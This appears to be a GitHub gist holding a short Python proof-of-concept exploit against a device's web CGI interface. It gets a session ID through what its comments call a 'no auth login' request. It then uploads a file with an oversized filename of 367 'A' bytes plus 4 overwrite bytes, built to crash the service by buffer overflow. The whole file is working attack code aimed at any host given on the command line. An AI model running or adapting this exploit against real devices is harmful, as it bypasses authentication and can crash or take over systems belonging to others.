import requests | |
from bs4 import BeautifulSoup | |
import sys | |
host = sys.argv[1] | |
URL = "http://"+host+"/scgi?sid=0&pid=dologin" | |
head = {"Referer" : "http://"+host+"/scgi?pid=0&action=dologin"} | |
# no auth login | |
payload = {"fd":"Cg=="} | |
junk = "E"*10000 | |
def getsid(): | |
r = requests.post(URL, headers=head, data=payload) | |
# fudge to get valid SID | |
rt = r.text | |
soup = BeautifulSoup(rt,"lxml") | |
nsid = soup.a | |
bsid = nsid.get('href') | |
bsid = bsid[9:49] | |
return bsid | |
def docrash(): | |
crash = "A"*367 # buffer to crash | |
crash += "C"*4 # overwrites next 4 bytes of EBX | |
file = {"foo":"bar"} | |
files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})} | |
formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm" | |
rf = requests.post(formURL, headers=head, files=files) | |
print(rf.text) | |
if __name__ == "__main__": | |
docrash() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment